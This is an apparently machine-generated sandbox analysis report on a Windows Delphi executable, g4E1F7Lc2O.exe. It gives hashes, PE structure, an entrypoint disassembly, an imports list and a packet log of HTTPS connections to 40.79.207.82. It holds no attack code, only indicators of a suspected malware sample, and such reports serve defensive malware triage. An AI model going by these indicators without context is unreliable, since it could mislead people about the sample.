                                        File name:g4E1F7Lc2O.exe
                                        File size:1017856
                                        MD5:7274d6c1a7dc0a091e1a801165f879cd
                                        SHA1:cc686677e1e22b71ef2b18559adb4c16aef11756
                                        SHA256:3b5a4b0fe5b8f4fd9bf24f32712e69da23b412a5653e0042d23a1d2429c42379
                                        SHA512:4ef480116b4c068e7a45a0e1e9a7b2f94aa3af52fa1788572d53c868df312fb90571a3140ccca611e965d5eace88f33cb71f458216e77b61d4d6119c5a7f9c32
                                        SSDEEP:12288:FYfGUHuv5bSkBsFkT5m3GpOAz1yeoAdrL7i:FYOUUtBs2YqO8PrPi
                                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                        File Icon

                                        Icon Hash:8aa2b2b2a2ead4ca

                                        Static PE Info

                                        General

                                        Entrypoint:0x45d078
                                        Entrypoint Section:CODE
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                                        DLL Characteristics:
                                        Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:91a12f22e7f2305a107edddf42c40880

                                        Entrypoint Preview

                                        Instruction
                                        push ebp
                                        mov ebp, esp
                                        add esp, FFFFFFF0h
                                        mov eax, 0045CE78h
                                        call 00007F3CB8A5B955h
                                        nop
                                        nop
                                        nop
                                        nop
                                        mov eax, dword ptr [004EBEE4h]
                                        mov eax, dword ptr [eax]
                                        call 00007F3CB8AA8A09h
                                        mov ecx, dword ptr [004EC070h]
                                        mov eax, dword ptr [004EBEE4h]
                                        mov eax, dword ptr [eax]
                                        mov edx, dword ptr [0045CAD8h]
                                        call 00007F3CB8AA8A09h
                                        mov eax, dword ptr [004EBEE4h]
                                        mov eax, dword ptr [eax]
                                        call 00007F3CB8AA8A7Dh
                                        call 00007F3CB8A596E0h
                                        lea eax, dword ptr [eax+00h]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xee0000x2378.idata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xfa0000x5200.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xf30000x67b8.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0xf20000x18.rdata
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        CODE0x10000x5c0c40x5c200False0.52856014671data6.54808365971IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                        DATA0x5e0000x8e0780x8e200False0.271541062005data4.82008212297IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                        BSS0xed0000xe6d0x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                        .idata0xee0000x23780x2400False0.363932291667data5.0056698415IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                        .tls0xf10000x100x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                        .rdata0xf20000x180x200False0.05078125data0.199107517787IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                        .reloc0xf30000x67b80x6800False0.635967548077data6.69152272812IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                        .rsrc0xfa0000x52000x5200False0.32831554878data4.78370739432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountry
                                        RT_CURSOR0xfa7740x134data
                                        RT_CURSOR0xfa8a80x134data
                                        RT_CURSOR0xfa9dc0x134data
                                        RT_CURSOR0xfab100x134data
                                        RT_CURSOR0xfac440x134data
                                        RT_CURSOR0xfad780x134data
                                        RT_CURSOR0xfaeac0x134data
                                        RT_ICON0xfafe00x10a8dataEnglishUnited States
                                        RT_STRING0xfc0880x418data
                                        RT_STRING0xfc4a00x1d8data
                                        RT_STRING0xfc6780x198data
                                        RT_STRING0xfc8100x174data
                                        RT_STRING0xfc9840x254data
                                        RT_STRING0xfcbd80xe8data
                                        RT_STRING0xfccc00x24cdata
                                        RT_STRING0xfcf0c0x3f4data
                                        RT_STRING0xfd3000x378data
                                        RT_STRING0xfd6780x3e8data
                                        RT_STRING0xfda600x234data
                                        RT_STRING0xfdc940xecdata
                                        RT_STRING0xfdd800x1b4data
                                        RT_STRING0xfdf340x3e4data
                                        RT_STRING0xfe3180x358data
                                        RT_STRING0xfe6700x2b4data
                                        RT_RCDATA0xfe9240x10data
                                        RT_RCDATA0xfe9340x2a8data
                                        RT_RCDATA0xfebdc0x474Delphi compiled form 'T__3960965291'
                                        RT_GROUP_CURSOR0xff0500x14Lotus unknown worksheet or configuration, revision 0x1
                                        RT_GROUP_CURSOR0xff0640x14Lotus unknown worksheet or configuration, revision 0x1
                                        RT_GROUP_CURSOR0xff0780x14Lotus unknown worksheet or configuration, revision 0x1
                                        RT_GROUP_CURSOR0xff08c0x14Lotus unknown worksheet or configuration, revision 0x1
                                        RT_GROUP_CURSOR0xff0a00x14Lotus unknown worksheet or configuration, revision 0x1
                                        RT_GROUP_CURSOR0xff0b40x14Lotus unknown worksheet or configuration, revision 0x1
                                        RT_GROUP_CURSOR0xff0c80x14Lotus unknown worksheet or configuration, revision 0x1
                                        RT_GROUP_ICON0xff0dc0x14dataEnglishUnited States

                                        Imports

                                        DLLImport
                                        kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
                                        user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                                        advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                        oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                        kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                        advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                        kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalSize, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetUserDefaultLCID, GetTickCount, GetThreadLocale, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                        version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                        gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionA, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateEnhMetaFileA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, CloseEnhMetaFile, BitBlt
                                        user32.dllCreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessageTime, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                        kernel32.dllSleep
                                        oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                        ole32.dllCreateStreamOnHGlobal, IsAccelerator, OleDraw, OleSetMenuDescriptor, CoTaskMemFree, ProgIDFromCLSID, StringFromCLSID, CoCreateInstance, CoGetClassObject, CoUninitialize, CoInitialize, IsEqualGUID
                                        oleaut32.dllGetErrorInfo, GetActiveObject, SysFreeString
                                        comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create

                                        Possible Origin

                                        Language of compilation systemCountry where language is spokenMap
                                        EnglishUnited States

                                        Network Behavior

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Sep 22, 2021 20:59:40.282000065 CEST49752443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:40.282063961 CEST4434975240.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:40.282191038 CEST49752443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:40.283202887 CEST49752443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:40.283219099 CEST4434975240.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:40.694860935 CEST4434975240.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:40.695179939 CEST49752443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:40.696235895 CEST4434975240.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:40.696692944 CEST49752443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:40.708823919 CEST49752443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:40.708852053 CEST4434975240.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:40.709259987 CEST4434975240.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:40.709465981 CEST49752443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:40.710762978 CEST49752443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:40.751136065 CEST4434975240.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:41.175420046 CEST4434975240.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:41.175467968 CEST4434975240.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:41.175498009 CEST4434975240.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:41.175770998 CEST49752443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:41.175800085 CEST4434975240.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:41.175967932 CEST49752443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:41.181009054 CEST49752443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:41.181324005 CEST4434975240.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:41.181370020 CEST4434975240.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:41.181474924 CEST49752443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:41.181579113 CEST49752443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:41.963984966 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:41.964018106 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:41.964114904 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:41.964770079 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:41.964778900 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:42.367603064 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:42.367826939 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:42.368619919 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:42.368638039 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:42.375359058 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:42.375376940 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:42.827646017 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:42.827682018 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:42.827708960 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:42.827771902 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:42.827832937 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:42.827842951 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:42.827903032 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:42.959759951 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:42.959790945 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:42.959927082 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:42.959944963 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:42.959958076 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:42.960036039 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:43.091038942 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:43.092420101 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:43.093745947 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:43.094419003 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:43.105434895 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:43.105592012 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:43.105614901 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:43.105648041 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:43.107206106 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:43.107237101 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:43.107248068 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:43.107347965 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:43.240186930 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:43.240365982 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:43.240633011 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:43.240772009 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:43.240837097 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:43.240942001 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:43.240962982 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:43.241058111 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:43.241080999 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:43.241194010 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:43.241209030 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:43.241318941 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:43.241338968 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:43.241436005 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:43.502465010 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:43.506122112 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:43.506511927 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:43.508093119 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:43.508130074 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:43.508156061 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:43.508164883 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:43.508173943 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:43.509690046 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:43.509733915 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:43.509762049 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:43.509916067 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:43.509937048 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:43.510016918 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:43.510035038 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:43.510116100 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:43.510135889 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:43.510324955 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:43.510348082 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:43.510529995 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:43.510548115 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:43.510628939 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:43.510641098 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:43.510720968 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:43.920655966 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:43.921255112 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:43.921310902 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:43.933300972 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:43.933343887 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:43.933363914 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:43.933368921 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:43.933624983 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:43.933634043 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:43.934958935 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:43.934974909 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:43.935260057 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:43.935267925 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:43.935370922 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:43.935376883 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:43.935503006 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:43.935509920 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:43.935635090 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:43.935642958 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:43.936717987 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:43.936728001 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:43.937899113 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:43.937911034 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:43.937992096 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:43.938025951 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:43.938035965 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:43.938082933 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:43.938088894 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:43.938153028 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:43.938209057 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.229084969 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.229929924 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.229937077 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.230056047 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.230082989 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.230201006 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.230225086 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.230372906 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.230390072 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.232578039 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.232625008 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.232749939 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.232773066 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.232917070 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.232939959 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.233052015 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.233076096 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.233352900 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.233366013 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.234963894 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.234998941 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.235011101 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.235029936 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.235150099 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.235172033 CEST4434975440.79.207.82192.168.2.4
